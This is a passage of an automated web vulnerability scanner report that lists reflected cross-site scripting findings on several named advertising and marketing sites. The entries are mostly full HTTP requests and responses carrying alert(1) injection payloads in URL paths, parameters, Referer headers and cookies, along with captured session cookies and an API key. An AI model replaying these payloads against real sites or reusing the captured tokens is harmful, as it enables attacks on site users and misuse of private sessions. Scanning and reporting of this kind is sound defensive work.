GET /external/ads/clo.gif2112e"style%3d"x%3aexpression(alert(1))"2aaa2fd7024?pvid=1331858988&cd=lifescript.com&d=http%3A//www.lifescript.com/Health/Conditions/ADD/Out_of_Control_It_Could_Be_ADHD.aspx&cache=1311276207557 HTTP/1.1
Host: www.righthealth.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/Health/Conditions/ADD/Out_of_Control_It_Could_Be_ADHD.aspx
Cookie: kid=09814286-B362-7915-D795-6E62A45FA162; __qca=P0-228604088-1305663651363; __utmz=168930850.1305663651.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; as=seo_all; __utma=168930850.1022900435.1305663651.1305663651.1305663651.1; NSC_lbpt.lptnjy.dpn=ffffffff090417b245525d5f4f58455e445a4a423992; NSC_hbnnb.lptnjy.dpn=ffffffff0904166145525d5f4f58455e445a4a423990

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:29:02 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=G; path=/
Set-Cookie: iq=external; path=/
Cache-Control: max-age=14400
Expires: Thu, 21 Jul 2011 23:29:02 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_hbnnb.lptnjy.dpn=ffffffff0904166145525d5f4f58455e445a4a423990;expires=Thu, 21-Jul-2011 19:44:02 GMT;path=/
Content-Length: 20694

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<meta name="title" content="Ads clo.gif2112e"style="x:expression(alert(1))"2aaa2fd7024" />
...[SNIP]...

3.114. http://www.righthealth.com/external/ads/clo.gif [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.righthealth.com
Path:   /external/ads/clo.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 74187<a%20b%3dc>5f12c9056f0 was submitted in the REST URL parameter 3. This input was echoed as 74187<a b=c>5f12c9056f0 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /external/ads/clo.gif74187<a%20b%3dc>5f12c9056f0?pvid=1331858988&cd=lifescript.com&d=http%3A//www.lifescript.com/Health/Conditions/ADD/Out_of_Control_It_Could_Be_ADHD.aspx&cache=1311276207557 HTTP/1.1
Host: www.righthealth.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/Health/Conditions/ADD/Out_of_Control_It_Could_Be_ADHD.aspx
Cookie: kid=09814286-B362-7915-D795-6E62A45FA162; __qca=P0-228604088-1305663651363; __utmz=168930850.1305663651.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; as=seo_all; __utma=168930850.1022900435.1305663651.1305663651.1305663651.1; NSC_lbpt.lptnjy.dpn=ffffffff090417b245525d5f4f58455e445a4a423992; NSC_hbnnb.lptnjy.dpn=ffffffff0904166145525d5f4f58455e445a4a423990

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:29:32 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=G; path=/
Set-Cookie: iq=external; path=/
Cache-Control: max-age=14400
Expires: Thu, 21 Jul 2011 23:29:32 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_hbnnb.lptnjy.dpn=ffffffff0904166145525d5f4f58455e445a4a423990;expires=Thu, 21-Jul-2011 19:44:32 GMT;path=/
Content-Length: 20501

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<span>One sec... we're building clo.gif74187<a b=c>5f12c9056f0 for <strong>
...[SNIP]...

3.115. http://www.silverpop.com/preferences_sf/login.sp [failureHandler parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.silverpop.com
Path:   /preferences_sf/login.sp

Issue detail

The value of the failureHandler request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f35f"><script>alert(1)</script>3b6fd41a04e was submitted in the failureHandler parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /preferences_sf/login.sp?height=150&width=300&successHandler=Downloads%3DHoliday%20Marketing%20Twists%26DestinationURL%3D/marketing-resources/white-papers/download/confirm.html%26Parameters%3DEmail%2CDownloads%26LeadSource%3DHoliday%20Marketing%20Twists%20White%20Paper%20Download%26PromoCode%3DHoliday%20Marketing%20Twists%20White%20Paper%20Download&failureHandler=7f35f"><script>alert(1)</script>3b6fd41a04e&_=1311364658877 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
X-Requested-With: XMLHttpRequest
Accept: */*
Cache-Control: no-cache
Host: www.silverpop.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 19:59:16 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Content-Length: 810
Content-Type: text/html; charset=UTF-8

<form method="post" onsubmit="dynamicLogin(this.Email.value,'Downloads=Holiday Marketing Twists&DestinationURL=/marketing-resources/white-papers/download/confirm.html&Parameters=Email,Downloads&LeadSource=Holiday Marketing Twists White Paper Download&PromoCode=Holiday Marketing Twists White Paper Download','7f35f"><script>alert(1)</script>3b6fd41a04e'); return false;">
...[SNIP]...

3.116. http://www.silverpop.com/preferences_sf/login.sp [successHandler parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.silverpop.com
Path:   /preferences_sf/login.sp

Issue detail

The value of the successHandler request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f3da"><script>alert(1)</script>bfa58457b61 was submitted in the successHandler parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /preferences_sf/login.sp?height=150&width=300&successHandler=Downloads%3DHoliday%20Marketing%20Twists%26DestinationURL%3D/marketing-resources/white-papers/download/confirm.html%26Parameters%3DEmail%2CDownloads%26LeadSource%3DHoliday%20Marketing%20Twists%20White%20Paper%20Download%26PromoCode%3DHoliday%20Marketing%20Twists%20White%20Paper%20Download7f3da"><script>alert(1)</script>bfa58457b61&failureHandler=&_=1311364658877 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
X-Requested-With: XMLHttpRequest
Accept: */*
Cache-Control: no-cache
Host: www.silverpop.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 19:58:52 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Content-Length: 810
Content-Type: text/html; charset=UTF-8

<form method="post" onsubmit="dynamicLogin(this.Email.value,'Downloads=Holiday Marketing Twists&DestinationURL=/marketing-resources/white-papers/download/confirm.html&Parameters=Email,Downloads&LeadSource=Holiday Marketing Twists White Paper Download&PromoCode=Holiday Marketing Twists White Paper Download7f3da"><script>alert(1)</script>bfa58457b61',''); return false;">
...[SNIP]...

3.117. http://www.silverpop.com/preferences_sf/prepopulateFields.js.sp [&fld[] parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.silverpop.com
Path:   /preferences_sf/prepopulateFields.js.sp

Issue detail

The value of the &fld[] request parameter is copied into the HTML document as plain text between tags. The payload 1cd43<script>alert(1)</script>ec8a814e59f was submitted in the &fld[] parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /preferences_sf/prepopulateFields.js.sp?&fld[]=FirstName1cd43<script>alert(1)</script>ec8a814e59f&fld[]=LastName&fld[]=Email&fld[]=Company&fld[]=Industry&fld[]=Phone&fld[]=State&fld[]=Country&fld[]=PostalCode&fld[]=CurrentDeployment&fld[]=Timeframe&_=1311364459504 HTTP/1.1
Host: www.silverpop.com
Proxy-Connection: keep-alive
Referer: http://www.silverpop.com/demo/index.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/javascript, application/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 19:55:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 305
Content-Type: text/html; charset=UTF-8

updatePrepopulatedFields({
'FirstName1cd43<script>alert(1)</script>ec8a814e59f': '',
'LastName': '',
'Email': '',
'Company': '',
'Industry': '',
'Phone': '',
'State': '',
'Country': '',
'PostalCode': '',
'CurrentDeployment': '',
'Timeframe
...[SNIP]...

3.118. http://www.silverpop.com/preferences_sf/prepopulateFields.js.sp [fld[] parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.silverpop.com
Path:   /preferences_sf/prepopulateFields.js.sp

Issue detail

The value of the fld[] request parameter is copied into the HTML document as plain text between tags. The payload 6bdab<script>alert(1)</script>dffdd7b3753 was submitted in the fld[] parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /preferences_sf/prepopulateFields.js.sp?&fld[]=FirstName&fld[]=LastName6bdab<script>alert(1)</script>dffdd7b3753&fld[]=Email&fld[]=Company&fld[]=Industry&fld[]=Phone&fld[]=State&fld[]=Country&fld[]=PostalCode&fld[]=CurrentDeployment&fld[]=Timeframe&_=1311364459504 HTTP/1.1
Host: www.silverpop.com
Proxy-Connection: keep-alive
Referer: http://www.silverpop.com/demo/index.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/javascript, application/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 19:55:58 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 305
Content-Type: text/html; charset=UTF-8

updatePrepopulatedFields({
'FirstName': '',
'LastName6bdab<script>alert(1)</script>dffdd7b3753': '',
'Email': '',
'Company': '',
'Industry': '',
'Phone': '',
'State': '',
'Country': '',
'PostalCode': '',
'CurrentDeployment': '',
'Timeframe': '',
'': ''
})
...[SNIP]...

3.119. http://api.bizographics.com/v1/profile.json [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload d670d<script>alert(1)</script>b99a9855237 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoData&api_key=r9t72482usanbp6sphprhvun HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: d670d<script>alert(1)</script>b99a9855237
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192; BizoData=tpCKokqYoGQhUXUii5DtcSNQb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe2GokttNiptM6FExkNK7HUtFp4B4dlWpgdhSIRMejJJHYD8l3ZY0x538oYYx7zFKAiiaQIFsisgNSNyapcheyl9qqj5isLeKJDB2UPGjg3vXDjpIpvQ2ul4q8MQQAdGRQisgNGpunspyGhHwpKMTlyYtq6Za6UAkBPsFfYeuxE6rBNXvlsMJ7hbaahMwGHWJy7cP8bcdojm5is3wEUThITfFDIipF2rkN6WsamcD5VW1iiLhR1ipFUs24V52t2cN1qss1vBdTs9TcInbC13AzyJVMisQS3uIkipyKbm8481vVAn4t3h6RTVissytDGtO0HVbGfbrxfWf6lnG4WL41W3AH0xNl7tETxisHP1G6sC1FckSLE2C8oCp9uCwcaIYpAt5zvJh0QDyipWUVtAQ9nxHLCs8DdoSbabpX; BizoNetworkPartnerIndex=3

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Sat, 23 Jul 2011 04:31:24 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 58
Connection: keep-alive

Unknown Referer: d670d<script>alert(1)</script>b99a9855237

3.120. http://a.collective-media.net/cmadj/cm.yearbook/ford_ron_071911 [cli cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/cm.yearbook/ford_ron_071911

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1a3e'%3balert(1)//6c633eca4ea was submitted in the cli cookie. This input was echoed as f1a3e';alert(1)//6c633eca4ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.yearbook/ford_ron_071911;sz=300x250;net=cm;ord=1520731557;ord1=218732;cmpgurl=http%253A//games.myyearbook.com/? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: cli=11fda490648f83cf1a3e'%3balert(1)//6c633eca4ea; JY57=3kllfTqBzxxTNc9vAlundMYc3uaxeM3o8ANWZfHmJX3kmfPanrzCyLw; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Thu, 21 Jul 2011 18:00:53 GMT
Content-Length: 8525
Connection: close
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Fri, 22-Jul-2011 18:00:53 GMT
Set-Cookie: exdp=1; domain=collective-media.net; path=/; expires=Thu, 28-Jul-2011 18:00:53 GMT
Set-Cookie: vadp=1; domain=collective-media.net; path=/; expires=Thu, 28-Jul-2011 18:00:53 GMT
Set-Cookie: ibvr=1; domain=collective-media.net; path=/; expires=Thu, 28-Jul-2011 18:00:53 GMT

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
anguage="Javascript">CollectiveMedia.createAndAttachAd("cm-10118186198_1311271253","http://ib.adnxs.com/ptj?member=311&inv_code=cm.yearbook&size=300x250&imp_id=cm-10118186198_1311271253,11fda490648f83cf1a3e';alert(1)//6c633eca4ea&referrer=http%3A%2F%2Fgames.myyearbook.com%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.yearbook%2Fford_ron_071911%3Bnet%3Dcm%3Bu%3D%2Ccm-10118186198_1311271253%2C11fda490648f83cf1a3e%27%3Baler
...[SNIP]...

3.121. http://a.collective-media.net/cmadj/cm.yearbook/ford_ron_071911 [cli cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/cm.yearbook/ford_ron_071911

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8adf7"%3balert(1)//1d3130726fc was submitted in the cli cookie. This input was echoed as 8adf7";alert(1)//1d3130726fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.yearbook/ford_ron_071911;sz=300x250;net=cm;ord=1520731557;ord1=218732;cmpgurl=http%253A//games.myyearbook.com/? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: cli=11fda490648f83c8adf7"%3balert(1)//1d3130726fc; JY57=3kllfTqBzxxTNc9vAlundMYc3uaxeM3o8ANWZfHmJX3kmfPanrzCyLw; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Thu, 21 Jul 2011 18:00:53 GMT
Content-Length: 8525
Connection: close
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Fri, 22-Jul-2011 18:00:53 GMT
Set-Cookie: exdp=1; domain=collective-media.net; path=/; expires=Thu, 28-Jul-2011 18:00:53 GMT
Set-Cookie: vadp=1; domain=collective-media.net; path=/; expires=Thu, 28-Jul-2011 18:00:53 GMT
Set-Cookie: ibvr=1; domain=collective-media.net; path=/; expires=Thu, 28-Jul-2011 18:00:53 GMT

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
</scr'+'ipt>');CollectiveMedia.addPixel("http://pixel.quantserve.com/seg/r;a=p-86ZJnSph3DaTI;rand=526077459;redirect=http://a.collective-media.net/datapair?net=qc&id=11fda490648f83c8adf7";alert(1)//1d3130726fc&segs=!qcsegs&op=add",true);CollectiveMedia.addPixel("http://load.exelator.com/load/?p=104&g=210&j=0",false);CollectiveMedia.addPixel("http://ws.visualdna.com/syncs/collective",false);CollectiveMedia.a
...[SNIP]...

3.122. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the BMX_3PC cookie is copied into the HTML document as plain text between tags. The payload 1e5de<script>alert(1)</script>ffc4383bf9a was submitted in the BMX_3PC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p110040101&PRAd=1355335&AR_C=1498970 HTTP/1.1
Host: ar.voicefive.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/landing/pool
Cookie: ar_p87077372=exp=1&initExp=Tue May 3 15:42:17 2011&recExp=Tue May 3 15:42:17 2011&prad=124094&arc=184537%3F684451&; ar_p98294060=exp=3&initExp=Wed May 11 10:54:18 2011&recExp=Wed May 11 11:00:09 2011&prad=14731&arc=33392&; ar_p101983071=exp=1&initExp=Tue May 17 14:40:10 2011&recExp=Tue May 17 14:40:10 2011&prad=63480745&arc=42046148&; ar_p110040101=exp=1&initExp=Thu Jul 21 18:00:58 2011&recExp=Thu Jul 21 18:00:58 2011&prad=1355334&arc=1498300&; BMX_G=method->-1,ts->1311271258; BMX_3PC=11e5de<script>alert(1)</script>ffc4383bf9a; UID=39460fd-77.67.87.8-1311271269

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 21 Jul 2011 18:42:39 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p110040101=exp=3&initExp=Thu Jul 21 18:00:58 2011&recExp=Thu Jul 21 18:42:39 2011&prad=1355335&arc=1498970&; expires=Wed 19-Oct-2011 18:42:39 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 28729

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1355335",Pid:"p110040101",Arc:"1498970",Location:COM
...[SNIP]...
->-1,ts->1311271258', "ar_p87077372": 'exp=1&initExp=Tue May 3 15:42:17 2011&recExp=Tue May 3 15:42:17 2011&prad=124094&arc=184537%3F684451&', "UID": '39460fd-77.67.87.8-1311271269', "BMX_3PC": '11e5de<script>alert(1)</script>ffc4383bf9a', "ar_p98294060": 'exp=3&initExp=Wed May 11 10:54:18 2011&recExp=Wed May 11 11:00:09 2011&prad=14731&arc=33392&', "ar_p110040101": 'exp=2&initExp=Thu Jul 21 18:00:58 2011&recExp=Thu Jul 21 18:42:27
...[SNIP]...

3.123. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the BMX_G cookie is copied into the HTML document as plain text between tags. The payload bb9ff<script>alert(1)</script>1dc8b182675 was submitted in the BMX_G cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p110040101&PRAd=1355335&AR_C=1498970 HTTP/1.1
Host: ar.voicefive.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/landing/pool
Cookie: ar_p87077372=exp=1&initExp=Tue May 3 15:42:17 2011&recExp=Tue May 3 15:42:17 2011&prad=124094&arc=184537%3F684451&; ar_p98294060=exp=3&initExp=Wed May 11 10:54:18 2011&recExp=Wed May 11 11:00:09 2011&prad=14731&arc=33392&; ar_p101983071=exp=1&initExp=Tue May 17 14:40:10 2011&recExp=Tue May 17 14:40:10 2011&prad=63480745&arc=42046148&; ar_p110040101=exp=1&initExp=Thu Jul 21 18:00:58 2011&recExp=Thu Jul 21 18:00:58 2011&prad=1355334&arc=1498300&; BMX_G=method->-1,ts->1311271258bb9ff<script>alert(1)</script>1dc8b182675; BMX_3PC=1; UID=39460fd-77.67.87.8-1311271269

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 21 Jul 2011 18:42:39 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p110040101=exp=3&initExp=Thu Jul 21 18:00:58 2011&recExp=Thu Jul 21 18:42:39 2011&prad=1355335&arc=1498970&; expires=Wed 19-Oct-2011 18:42:39 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 28729

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1355335",Pid:"p110040101",Arc:"1498970",Location:COM
...[SNIP]...
false);
}else{if(window.attachEvent){return window.attachEvent("onload",C.OnReady.onload);
